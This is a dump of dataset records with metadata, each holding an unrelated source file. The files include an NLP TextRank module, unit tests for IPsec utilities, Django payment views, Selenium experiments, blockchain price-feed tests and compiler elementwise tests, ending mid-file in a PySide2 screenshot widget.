calculate_output(conf_quiz)\nprint(a)\n","sub_path":"B2/dc_net.py","file_name":"dc_net.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209854240","text":"import string\n\nimport networkx as nx\n\nfrom nlp.text_parsing import parse_text\n\nWINDOW_SIZE = 3\n\nPOS_KEPT = [\"ADJ\",\n \"NOUN\",\n \"PROPN\",\n \"VERB\"]\n\n\ndef increment_edge(graph, node0, node1):\n \"\"\"Increment the weight of the edge <``node0``, ``node1``> in ``graph``.\n\n Args:\n graph (nx.Graph): graph.\n node0 (int): first node id.\n node1 (int): second node id.\n \"\"\"\n if graph.has_edge(node0, node1):\n graph[node0][node1][\"weight\"] += 1.0\n else:\n graph.add_edge(node0, node1, weight=1.0)\n\n\ndef link_sentence(doc, lemma_graph, seen_lemma):\n \"\"\"Link a sentence in the ``lemma_graph`` by adding the relevant vertices and edges.\n\n Args:\n doc (spacy.Doc): sent.\n lemma_graph (nx.Graph): lemma graph.\n seen_lemma (dict): a vocab-dict for lemma.\n \"\"\"\n visited_tokens = []\n visited_nodes = []\n\n for token in doc:\n if token.pos_ in POS_KEPT:\n key = (token.lemma_, token.pos_)\n if key not in seen_lemma:\n seen_lemma[key] = {token.lower}\n else:\n seen_lemma[key].add(token.lower)\n\n node_id = list(seen_lemma.keys()).index(key)\n if node_id not in lemma_graph:\n lemma_graph.add_node(node_id)\n\n for prev_token in range(len(visited_tokens) - 1, -1, -1):\n if (token.i - visited_tokens[prev_token]) <= WINDOW_SIZE:\n increment_edge(lemma_graph, node_id, visited_nodes[prev_token])\n else:\n break\n\n visited_tokens.append(token.i)\n visited_nodes.append(node_id)\n\n\ndef get_labels(seen_lemma, non_lemma=False):\n \"\"\"Get labels for seen lemmas.\n\n Args:\n seen_lemma (dict): map graph nodes to lemmas.\n non_lemma (bool): whether to include non lemmas.\n\n Returns:\n dict\n \"\"\"\n labels = {}\n for node_id, lbl in enumerate(seen_lemma.keys()):\n lemma_, _ = lbl\n lemma_ = lemma_.lower()\n if non_lemma is False and lemma_ in string.punctuation:\n continue\n labels[node_id] = lemma_\n return labels\n\n\ndef collect_phrases(ranks, labels, num_phrases=5):\n \"\"\"Collect phrases from a ranked lemma graph.\n\n Args:\n ranks (dict): map graph nodes to their ranking.\n lables (dict): map graph nodes to their corresponding lemma.\n num_phrases (int): num of phrases to return.\n\n Returns:\n list\n \"\"\"\n phrase_list = []\n phrase_num = 0\n for node_id, rank in sorted(ranks.items(), key=lambda x: x[1], reverse=True):\n lemma = labels.get(node_id)\n if not lemma:\n continue\n phrase_list.append((lemma, rank))\n phrase_num += 1\n if phrase_num == num_phrases:\n break\n return phrase_list\n\n\ndef calc_textrank(corpus, num_phrases=5):\n \"\"\"Build a lemma graph and calculate ``pagerank``.\n\n Args:\n corpus (list[str]): corpus of cleaned sentences.\n num_phrases (int): num of phrases to return.\n\n Returns:\n (lemma_graph, labels, ranks, phrase_list)\n s.t\n lemma_graph: nx.Graph\n labels: dict\n ranks: dict\n phrase_list: list[tuple]\n \"\"\"\n lemma_graph = nx.Graph()\n seen_lemma = {}\n\n for sent in corpus:\n doc = parse_text(sent)\n link_sentence(doc, lemma_graph, seen_lemma)\n\n ranks = nx.pagerank(lemma_graph)\n labels = get_labels(seen_lemma)\n phrase_list = collect_phrases(ranks, labels, num_phrases=num_phrases)\n return lemma_graph, labels, ranks, phrase_list\n","sub_path":"src/nlp/textrank.py","file_name":"textrank.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461574681","text":"import pytest\nfrom mock import Mock\n\n\ndef test_runcmd(monkeypatch):\n import ipsec.utils as utils\n sp = Mock()\n sp.Popen().returncode = 1\n sp.Popen().communicate.return_value = ('no', 'also no')\n monkeypatch.setattr(utils, 'sp', sp)\n with pytest.raises(utils.CommandError):\n utils.runcmd(['ls', '-l'])\n sp.Popen().returncode = 0\n assert utils.runcmd(['ls', '-l']) == None\n\ndef test_ipsecctl(monkeypatch):\n import ipsec.utils as utils\n runcmd = Mock()\n monkeypatch.setattr(utils, 'runcmd', runcmd)\n # refresh ipscctl\n utils.ipsecctl(\"/whee\")\n cmd = ['/sbin/ipsecctl', '-f', '/whee']\n runcmd.assert_called_with(cmd)\n # and a dry run\n utils.ipsecctl(\"/whee\", dryrun=True)\n cmd = ['/sbin/ipsecctl', '-f', '/whee', '-n']\n runcmd.assert_called_with(cmd)\n\ndef test_pfctl(monkeypatch):\n import ipsec.utils as utils\n import os.path\n exists = Mock()\n monkeypatch.setattr(os.path, 'exists', exists)\n runcmd = Mock()\n monkeypatch.setattr(utils, 'runcmd', runcmd)\n # run with no /etc/pf.conf\n exists.return_value = False\n utils.pfctl()\n assert runcmd.called == 0\n # real thing\n exists.return_value = True\n cmd = ['/sbin/pfctl', '-f', '/etc/pf.conf']\n utils.pfctl()\n runcmd.assert_called_with(cmd)\n # dry run\n cmd = ['/sbin/pfctl', '-f', '/etc/pf.conf', '-n']\n utils.pfctl(dryrun=True)\n runcmd.assert_called_with(cmd)\n","sub_path":"tests/unit/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"510965649","text":"import json\nimport time\nimport datetime\nfrom django.http import JsonResponse\nfrom apps.plan.db import create_plan, query_plan_by_id\nfrom apps.plan.tasks import handle_plan_acquisition_async\nfrom apps.plan.decorators import plan_acquisition_permission_check\nfrom apps.auth.decorators import login_required_ajax\nfrom apps.common.jwttools import verify_jwt\nfrom apps.order.db import create_order, gene_order_id\nfrom apps.order.codepay import CODEPAYWechatClient, CODEPAYAlipayClient\nfrom apps.common.code import *\nfrom apps.user.db import query_user_by_id\nfrom config.settings.default.db import MONGO_PAYMENT_COLLECTION\n\n\ndef create(request):\n name = request.POST['name']\n fee = int(request.POST['fee'])\n length = int(request.POST['length'])\n nodes = json.loads(request.POST['nodes'])\n content = request.POST['content']\n\n plan_id = create_plan(name, fee, length, content, nodes)\n return JsonResponse({\n 'code': 0,\n 'msg': '创建成功',\n 'data': {\n 'plan_id': plan_id\n }\n })\n\n\n# 之后需要做一下权限限制\n@plan_acquisition_permission_check\ndef acquire(request):\n user_id = request.POST['user_id']\n plan_id = request.POST['plan_id']\n handle_plan_acquisition_async.delay(user_id, plan_id)\n return JsonResponse({\n 'code': 0,\n 'msg': '后台正在加班运作中'\n })\n\n\n# @liaochangjiang 2018-06-07\n# 用户购买套餐的接口,返回一个付款界面\n@login_required_ajax\ndef buy(request):\n \"\"\"\n\n :param request: method,plan_id\n :return:\n \"\"\"\n method = int(request.POST['method'])\n if method == WECHAT_PAY_METHOD:\n client = CODEPAYWechatClient()\n elif method == ALIPAY_METHOD:\n client = CODEPAYAlipayClient()\n else:\n return JsonResponse({\n 'code': -1,\n 'msg': 'payment method not support!'\n })\n\n plan_id = int(request.POST['plan_id'])\n # 支付方式始终以codepay的接口为准:\n # 支付宝1,qq钱包2,微信支付3\n plyload, err = verify_jwt(request.COOKIES['jwt'])\n user_id = plyload['user_id']\n plan = query_plan_by_id(plan_id)\n amount = plan['fee']\n\n order_id = gene_order_id()\n MONGO_PAYMENT_COLLECTION.insert_one({\n 'type_code': REWARD_ORDER_TYPE,\n 'type_str': REWARD_ORDER_TYPE_STR,\n 'timestamp': int(time.time()),\n 'timestamp_str': str(datetime.datetime.now()).split(' ')[0],\n 'id': order_id,\n 'method': method,\n 'user_id': user_id,\n 'amount': amount,\n 'success': False,\n 'extra': {\n 'plan_id': plan_id\n }\n })\n\n codepay_url = client.gene_codepay_url(\n pay_id=order_id,\n price=amount,\n param={\n 'type_code': PLAN_ORDER_TYPE,\n 'type_str': PLAN_ORDER_TYPE_STR,\n 'order_id': order_id,\n }\n )\n return JsonResponse({\n 'code': 0,\n 'msg': '创建支付订单成功',\n 'data': {\n 'codepay_url': codepay_url\n }\n })\n","sub_path":"src/apps/plan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"12837857","text":"## DTSettingsConfig\n#\n# Copyright (c) 2016, Expressive Analytics, LLC .\n# All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n# @package Deep Thought\n# @author Blake Anderson \n# @copyright 2016 Expressive Analytics, LLC \n# @licence http://choosealicense.com/licenses/mit\n# @link http://www.expressiveanalytics.com\n# @since version 1.0.0\n\nfrom .DTSettings import DTSettings\nimport json\nimport os\n\nclass DTSettingsConfig(DTSettings):\n _shared_config = {}\n\n @classmethod\n def initShared(cls,path):\n cls._shared_config = json.load(open(path))\n return cls._shared_config\n\n @classmethod\n def sharedSettings(cls,settings=None):\n if settings is not None:\n cls._shared_config.update(settings)\n return cls._shared_config\n\n @classmethod\n def baseURL(cls,suffix=\"\"):\n base = \"\"\n if \"base_url\" in cls._shared_config:\n base = cls._shared_config[\"base_url\"]\n elif \"HTTP_HOST\" in os.environ:\n base = os.environ[\"HTTP_HOST\"]\n if base[-1:] != \"/\":\n base += \"/\"\n if base == \"/\":\n return \"/\"+suffix\n return \"{}://{}{}\".format(\"https\" if \"HTTPS\" in os.environ != \"off\" else \"http\",base,suffix)\n","sub_path":"deepthought/utils/DTSettingsConfig.py","file_name":"DTSettingsConfig.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"600200854","text":"\"\"\"\nCBI agents are investigating a case in which they came across certain names of the culprits.They decided to encode the names into the number format.\n\n\"Riya\" is encoded as \"729611390\",\"Sumitha\" as \"73108101981109993\" ,\"Anandita\" as \"55101891039410011294\" and so on...Help them to encode the names.\n\nInput:\n\nFirst line of input contains an integer T denoting the number of test cases.T lines follow each of which containes a string S denoting the name of the culprits.\nOutput:\n\nFor each test case,print the encoded Integer in a new line.\nConstraints:\n\n1<=T<=100 and Names contains only english alphabets\nExample:\n\nInput\n3\nSoni\nMona\nPawan\n\nOutput\n7310210298\n6710210290\n708811190104\n\"\"\"\n\n\ndef encoding_names(s):\n ans = \"\"\n for i in range(len(s)):\n ans += str(ord(s[i]) - 10 + i)\n return ans\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(t):\n s = input()\n print(encoding_names(s))\n","sub_path":"practice/Basic/encoding_names.py","file_name":"encoding_names.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"548411372","text":"# coding=utf-8\nimport torch.nn as nn\n\nimport pdb\nimport torch\n\n\nclass BOW(nn.Module):\n \"\"\"BOW for markdown header\"\"\"\n \"\"\"\n\tcalculate average embedding of words in header\n\tpadding 2\n \"\"\"\n\n def __init__(self, markdown_vocab_size, emb_size, padding_idx):\n super(BOW, self).__init__()\n # self.arg = arg\n self.markdown_vocab_size = markdown_vocab_size\n self.emb_size = emb_size\n self.padding_idx = padding_idx\n self.embedding = nn.Embedding(\n markdown_vocab_size, emb_size, padding_idx=padding_idx)\n\n def forward(self, markdown_label, markdown_len):\n # pdb.set_trace()\n token_embedding = self.embedding(markdown_label)\n sum_embedding = torch.sum(token_embedding, dim=1)\n avg_embedding = torch.div(sum_embedding.T, markdown_len).T\n return avg_embedding\n # pdb.set_trace()\n # raise NotImplementedError\n","sub_path":"bert_pytorch/model/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"634830053","text":"# from selenium import webdriver\n# from selenium.webdriver import ActionChains\n# from selenium import webdriver\n#\n# browser = webdriver.Firefox()\n# url = 'https://www.zhihu.com/explore'\n# browser.get(url)\n# input = browser.find_element_by_class_name('zu-top-add-question')\n# print(input)\n#\n# print(input.text)\n# print(input.id)\n# print(input.location)\n# print(input.tag_name)\n# print(input.size)\n\n\n# import time\n# # from selenium import webdriver\n# # from selenium.common.exceptions import NoSuchElementException\n# #\n# # browser = webdriver.Firefox()\n# # url = 'http://www.runoob.com/try/try.php?filename=jqueryui-api-droppable'\n# # browser.get(url)\n# # browser.switch_to.frame('iframeResult')\n# # try:\n# # logo = browser.find_element_by_class_name('logo')\n# # except NoSuchElementException:\n# # print('NO LOGO')\n# # browser.switch_to.parent_frame()\n# # logo = browser.find_element_by_class_name('logo')\n# # print(logo)\n# # print(logo.text)\n\n\nimport time\nfrom selenium import webdriver\n\nbrowser = webdriver.Firefox()\nbrowser.get('https://www.baidu.com')\nbrowser.execute_script('window.open()')\nprint(browser.window_handles)\nbrowser.sw(browser.window_handles[1])\nbrowser.get('https://www.taobao.com')\ntime.sleep(1)\nbrowser.switch_to_window(browser.window_handles[0])\nbrowser.get('https://python.org')","sub_path":"WorksZhang/GT_0723/se_next.py","file_name":"se_next.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418512816","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n#########################################################\n# Author: Author\n#########################################################\n# File: quewords.py\n# Description: Lista cada palavra e o números de vezes que ela\n# ocorre utilizando defaultdict...\n\nfrom collections import defaultdict\nimport string\nimport sys\n\n# defaultdict - cria uma chave com um valor padrão caso não exista\n# no dicionário, seu comportamento é similiar ao dicionário comum...\nwords = defaultdict(int)\nstrip = string.whitespace + string.punctuation + string.digits + \"\\\"'\"\nfor filename in sys.argv[1:]:\n\tfor line in open(filename):\n\t\tfor word in line.lower().split():\n\t\t\tword = word.strip(strip) #Retira os caracteres definidos em strip.\n\t\t\tif len (word) > 2: #Verifica se é uma palavra acima de 3 leras..\n\t\t\t\t\"\"\"\n\t\t\t\ttoda vezes que um objeto não for encontrado um novo item será\n\t\t\t\tcriado caso exista será incrementado +1 ao seu valor...\n\t\t\t\t\"\"\"\n\t\t\t\twords[word] += 1\nelse:\n\tprint(\"\\nUsage: {0} filename.txt\".format(sys.argv[0]))\nfor num,word in enumerate(sorted(words), start=1):\n\tprint(\"{2:<10}'{0:.<30}' occurs {1} times\".format(word, words[word],num))\n","sub_path":"cap03/quewords2.py","file_name":"quewords2.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"444658437","text":"import time\nimport pytest\nfrom brownie import PriceContract, network\nfrom scripts.helpful_scripts import LOCAL_BLOCKCHAIN_ENVIRONMENTS, get_account, get_contract\n \n \n@pytest.fixture\ndef deploy_price_contract(get_job_id, chainlink_fee):\n # Arrange / Act\n price_contract = PriceContract.deploy(\n get_contract(\"oracle\").address,\n get_job_id,\n chainlink_fee,\n get_contract(\"link_token\").address,\n get_contract(\"btc_usd_price_feed\").address,\n {\"from\": get_account()},\n )\n # Assert\n assert price_contract is not None\n return price_contract\n \n \ndef test_send_api_request_local(deploy_price_contract, chainlink_fee, get_data):\n # Arrange\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip(\"Only for local testing\")\n price_contract = deploy_price_contract\n get_contract(\"link_token\").transfer(\n price_contract.address, chainlink_fee * 2, {\"from\": get_account()}\n )\n # Act\n transaction_receipt = price_contract.requestPriceData({\"from\": get_account()})\n requestId = transaction_receipt.events[\"ChainlinkRequested\"][\"id\"]\n # Assert\n get_contract(\"oracle\").fulfillOracleRequest(requestId, get_data, {\"from\": get_account()})\n assert isinstance(price_contract.priceFeedGreater(), bool)\n\ndef test_send_api_request_testnet(deploy_price_contract, chainlink_fee):\n # Arrange\n if network.show_active() not in [\"kovan\", \"rinkeby\", \"mainnet\"]:\n pytest.skip(\"Only for local testing\")\n price_contract = deploy_price_contract\n get_contract(\"link_token\").transfer(\n price_contract.address, chainlink_fee * 2, {\"from\": get_account()}\n )\n # Act\n transaction = price_contract.requestPriceData({\"from\": get_account()})\n # Assert\n assert transaction is not None\n transaction.wait(2)\n time.sleep(35)\n assert isinstance(price_contract.priceFeedGreater(), bool)\n \ndef test_can_get_latest_price(get_job_id, chainlink_fee):\n # Arrange / Act\n price_contract = PriceContract.deploy(\n get_contract(\"oracle\").address,\n get_job_id,\n chainlink_fee,\n get_contract(\"link_token\").address,\n get_contract(\"btc_usd_price_feed\"),\n {\"from\": get_account()},\n )\n # price_contract = deploy_price_contract\n # Assert\n value = price_contract.getLatestPrice()\n assert isinstance(value, int)\n assert value > 0","sub_path":"tests/test_price_contract.py","file_name":"test_price_contract.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"582906314","text":"from django.conf.urls import url\n\nfrom .views import *\n\nurlpatterns = [\n\t# Remember, already have the subdirectory from the mama url file\n\n\turl(r'^corgi$', corgiwebsite, name = 'corgiwebsite'),\n\turl(r'^$', othersimplesamples, name = 'samples'),\n\turl(r'^zengarden$', zengarden, name = 'zengarden')\n\n\n]","sub_path":"portfoliowithdjango/portfolio/single_pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"103826836","text":"import numpy as np\nimport itertools\n\n\ndef fight(you, boss):\n \"\"\"run the fight to see who wins\"\"\"\n you_attack = you['damage'] - boss['armor']\n if you_attack < 1:\n you_attack = 1\n boss_attack = boss['damage'] - you['armor']\n if boss_attack < 1:\n boss_attack = 1\n boss_turns = np.ceil(you['hit']/boss_attack)\n you_turns = np.ceil(boss['hit']/you_attack)\n return you_turns <= boss_turns\n\n# input\nyou = {}\nboss = {}\nyou['hit'] = 100\nboss['hit'] = 100\nboss['damage'] = 8\nboss['armor'] = 2\n\nweapons = [(8, 4), (10, 5), (25, 6), (40, 7), (74, 8)]\narmors = [(13, 1), (31, 2), (53, 3), (75, 4), (102, 5), (0, 0)]\nrings_damage = [(25, 1), (50, 2), (100, 3), (0, 0)]\nrings_armor = [(20, 1), (40, 2), (80, 3), (0, 0)]\n\nlowest = 100000\niterable = itertools.product(range(len(weapons)),\n range(len(armors)),\n range(len(rings_damage) + len(rings_armor)),\n range(len(rings_damage) + len(rings_armor)))\nfor weapon_id, armor_id, r1, r2 in iterable:\n if r1 == r2:\n continue\n cost = 0\n cost += weapons[weapon_id][0]\n you['damage'] = weapons[weapon_id][1]\n\n cost += armors[armor_id][0]\n you['armor'] = armors[armor_id][1]\n\n rings_ids = [r1, r2]\n for r in rings_ids:\n if r <= 3:\n cost += rings_damage[r][0]\n you['damage'] += rings_damage[r][1]\n else:\n cost += rings_armor[r % len(rings_damage)][0]\n you['armor'] += rings_armor[r % len(rings_damage)][1]\n\n if fight(you, boss) and cost < lowest:\n lowest = cost\n\nprint(lowest)\n","sub_path":"2015/21_01.py","file_name":"21_01.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"219970224","text":"import dml\nimport prov.model\nimport datetime\nimport uuid\nimport gpxpy.geo\nimport random\n\nclass getBusinessesByCategory(dml.Algorithm):\n\n def project(R, p):\n return [p(t) for t in R]\n\n def select(R, s):\n return [t for t in R if s(t)]\n\n def product(R, S):\n return [(t, u) for t in R for u in S]\n\n def aggregate(R, f):\n keys = {r[0] for r in R}\n return [(key, f([v for (k, v) in R if k == key])) for key in keys]\n\n\n contributor = 'vinwah'\n reads = ['vinwah.businesses']\n writes = ['vinwah.businessesByCategory']\n\n @staticmethod\n def execute(trial=False):\n\n startTime = datetime.datetime.now()\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('vinwah', 'vinwah')\n\n businesses = repo['vinwah.businesses']\n\n # 1) find representative categories\n #projection. format of businessesCategories is [[json]]\n p = lambda x: (x['categories'])\n businessesCategories = getBusinessesByCategory.project(businesses.find(), p)\n \n #make histogram over categories\n categories_hist = {}\n for categories in businessesCategories:\n for category in categories:\n if category['title'] in categories_hist:\n categories_hist[category['title']] += 1\n else:\n categories_hist[category['title']] = 1\n\n del businessesCategories\n #find the 10 highest scors\n top10scors = []\n for key in categories_hist:\n top10scors.append(categories_hist[key])\n\n top10scors = sorted(top10scors)[-10:]\n\n # find the 10 categories associated with highest scors\n top10categories = []\n for key in categories_hist:\n if categories_hist[key] in top10scors:\n top10categories.append(key)\n\n\n # 2) project businesses into (lat, long, representable category)\n # and remove all businesses that does not conform to a category\n\n #project only needed data\n p = lambda x: (x['coordinates']['latitude'], x['coordinates']['longitude'], x['categories'])\n B = getBusinessesByCategory.project(businesses.find(), p)\n\n #Flatten the data and select category to associate business with\n for i in range(len(B)):\n temp = []\n for c in B[i][2]:\n temp.append(c['title'])\n cat = \"\"\n for c in temp:\n if c in top10categories:\n cat = c\n break\n B[i] = (B[i][0], B[i][1], cat)\n\n # select non-null data \n s = lambda x: (x[2] != \"\")\n B = getBusinessesByCategory.select(B, s)\n\n\n # grup by category\n data = []\n for c in top10categories:\n s = lambda x: x[2] == c\n P = getBusinessesByCategory.select(B, s)\n temp = []\n for p in P:\n temp.append({'lat':p[0], 'long':p[1]})\n data.append({c: temp})\n\n\n repo.dropCollection('businessesByCategory')\n repo.createCollection('businessesByCategory')\n repo['vinwah.businessesByCategory'].insert_many(data)\n\n repo.logout()\n endTime = datetime.datetime.now()\n\n print('getBusinessesByCategory finished at:', endTime)\n\n return {\"start\": startTime, \"end\": endTime}\n\n @staticmethod\n def provenance(doc=prov.model.ProvDocument(), startTime=None, endTime=None):\n \"\"\"\n Create the provenance document describing everything happening\n in this script. Each run of the script will generate a new\n document describing that invocation event.\n \"\"\"\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('vinwah', 'vinwah')\n\n doc.add_namespace('alg', 'http://datamechanics.io/algorithm/vinwah#') # The scripts are in # format.\n doc.add_namespace('dat', 'http://datamechanics.io/data/vinwah#') # The data sets are in # format.\n doc.add_namespace('ont', 'http://datamechanics.io/ontology#') # 'Extension', 'DataResource', 'DataSet', 'Retrieval', 'Query', or 'Computation'.\n doc.add_namespace('log', 'http://datamechanics.io/log/') # The event log.\n\n this_script = doc.agent('alg:getBusinessesByCategory', {prov.model.PROV_TYPE: prov.model.PROV['SoftwareAgent'], 'ont:Extension': 'py'})\n\n resource = doc.entity('dat:businesses', {'prov:label': 'Businesses in Boston', prov.model.PROV_TYPE: 'ont:DataSet'})\n\n get = doc.activity('log:uuid' + str(uuid.uuid4()), startTime, endTime)\n\n doc.wasAssociatedWith(get, this_script)\n\n doc.usage(get, resource, startTime, None, {prov.model.PROV_TYPE: 'ont:Computation'})\n\n enti = doc.entity('dat:businessesByCategory', {prov.model.PROV_LABEL: 'Location of Businesses in Boston by top 10 categories', prov.model.PROV_TYPE: 'ont:DataSet'})\n doc.wasAttributedTo(enti, this_script)\n doc.wasGeneratedBy(enti, get, endTime)\n doc.wasDerivedFrom(enti, resource, get, get, get)\n\n repo.logout()\n\n return doc\n\n","sub_path":"vinwah/getBusinessesByCategory.py","file_name":"getBusinessesByCategory.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"419744771","text":"#!/usr/bin/env python3\nimport unittest\nimport cinn\nimport numpy as np\nfrom cinn import runtime\nfrom cinn import ir\nfrom cinn.poly import create_stages\nfrom cinn import lang\nfrom cinn import Target\nfrom cinn import pe\nfrom cinn.common import *\n\n\nclass TestPEElementwise(unittest.TestCase):\n def setUp(self):\n self.m = 32\n self.n = 32\n\n self.target = Target()\n self.target.arch = Target.Arch.X86\n self.target.bits = Target.Bit.k32\n self.target.os = Target.OS.Linux\n\n self.unary_data = []\n\n def test_unary(self):\n for (fn_name, pe_fn, np_fn, dtype) in [\n (\"exp\", pe.exp, np.exp, \"float32\"),\n # TODO(wenming2014) not numpy\n # (\"erf\", pe.erf, np.erf, \"float32\"),\n # (\"sqrt\", pe.sqrt, np.sqrt, \"float32\"),\n # RuntimeWarning: divide by zero encountered in log2\n # (\"log2\", pe.log2, np.log2, \"float32\"),\n # (\"log10\", pe.log10, np.log10, \"float32\"),\n (\"floor\", pe.floor, np.floor, \"float32\"),\n (\"ceil\", pe.ceil, np.ceil, \"float32\"),\n # (\"round\", pe.round, np.round, \"float32\"),\n (\"trunc\", pe.trunc, np.trunc, \"float32\"),\n (\"cos\", pe.cos, np.cos, \"float32\"),\n (\"cosh\", pe.cosh, np.cosh, \"float32\"),\n (\"tan\", pe.tan, np.tan, \"float32\"),\n (\"sin\", pe.sin, np.sin, \"float32\"),\n (\"sinh\", pe.sinh, np.sinh, \"float32\"),\n # TODO(wenming2014) begin not numpy\n # (\"acos\", pe.acos, np.acos, \"float32\"),\n # (\"acosh\", pe.acosh, np.acosh, \"float32\"),\n # (\"asin\", pe.asin, np.asin, \"float32\"),\n # (\"asinh\", pe.asinh, np.asinh, \"float32\"),\n # (\"atan\", pe.atan, np.atan, \"float32\"),\n # (\"atanh\", pe.atanh, np.atanh, \"float32\"),\n # TODO(wenming2014) end\n (\"isnan\", pe.isnan, np.isnan, \"float32\"),\n (\"tanh\", pe.tanh, np.tanh, \"float32\"),\n (\"isfinite\", pe.isfinite, np.isfinite, \"float32\"),\n (\"isinf\", pe.isinf, np.isinf, \"float32\"),\n (\"negative\", pe.negative, np.negative, \"float32\"),\n # (\"identity\", pe.identity, np.identity, \"float32\"),\n # TODO(wenming2014) int type\n # (\"logical_not\", pe.logical_not, np.logical_not, \"int32\"),\n # (\"bitwise_not\", pe.bitwise_not, np.bitwise_not, \"int32\"),\n # TODO(wenming2014) not numpy\n # (\"sigmoid\", pe.sigmoid, np.sigmoid, \"float32\"),\n (\"sign\", pe.sign, np.sign, \"float32\"),\n (\"abs\", pe.abs, np.abs, \"float32\"),\n # TODO(wenming2014) not numpy\n # (\"rsqrt\", pe.rsqrt, np.rsqrt, \"float32\"),\n ]:\n self.compiler = cinn.Compiler.create(self.target)\n self.union_tester(fn_name, pe_fn, np_fn, dtype)\n\n def union_tester(self, fn_name, cinn_fn, np_fn, dtype=\"float32\"):\n m, n = [ir.Expr(_) for _ in (\n self.m,\n self.n,\n )]\n x = lang.Placeholder(dtype, \"x\", [m, n])\n y = cinn_fn(x.to_tensor())\n\n func_name = \"test_\" + fn_name\n\n stages = create_stages([x.to_tensor(), y])\n func = lang.lower(func_name, stages, [x.to_tensor(), y])\n\n builder = lang.Module.Builder(\"elementwise_module\", self.target)\n builder.add_function(func)\n\n module = builder.build()\n self.compiler.build(module)\n\n fn = self.compiler.lookup(func_name)\n\n x_data, x_buf, out_buf, *args = self.create_data(dtype)\n fn(args)\n\n self.assertTrue(\n np.allclose(\n out_buf.numpy(),\n self.create_target_data(x_data, np_fn),\n atol=1e-4))\n\n def create_target_data(self, x_data, np_target_fn):\n return np_target_fn(x_data)\n\n def create_data(self, dtype):\n if not self.unary_data:\n x_data = np.around(\n np.random.randn(self.m, self.n).astype(dtype), 2)\n x = runtime.cinn_buffer_t(x_data, runtime.cinn_x86_device)\n out = runtime.cinn_buffer_t(\n np.zeros([self.m, self.n]).astype(dtype),\n runtime.cinn_x86_device)\n self.unary_data = [\n x_data, x, out,\n runtime.cinn_pod_value_t(x),\n runtime.cinn_pod_value_t(out)\n ]\n\n return self.unary_data\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"python/tests/test_pe_elementwise.py","file_name":"test_pe_elementwise.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"223564701","text":"import sys\nimport time\n\nimport PySide2\nfrom PySide2.QtCore import Qt, Signal, QRect, QPoint\nfrom PySide2.QtGui import QPalette, QGuiApplication, QPixmap, QBrush, QPainter, QPaintEvent, QCursor, QMouseEvent, QPen, \\\n QColor\nfrom PySide2.QtWidgets import QApplication, QWidget\n\nfrom util.img_tool import pix_add_blurry, draw_circle\n\n\nclass ScreenShotMainWidget(QWidget):\n # 绘画信号\n draw_signal = Signal(QPoint, QPoint)\n desktop_pix = None\n\n # 鼠标点击开始点\n mouse_start_x = 0\n mouse_start_y = 0\n\n # 鼠标移动点\n mouse_current_x = 0\n mouse_current_y = 0\n\n # 鼠标释放点\n mouse_end_x = 0\n mouse_end_y = 0\n\n # 开始截图标识\n startFlag = False\n # 正在截图标识\n doingFlag = False\n # 截图结束标识\n endFlag = False\n\n hasResult = False\n\n show_widget = None\n\n def __init__(self, parent=None, ):\n super(ScreenShotMainWidget, 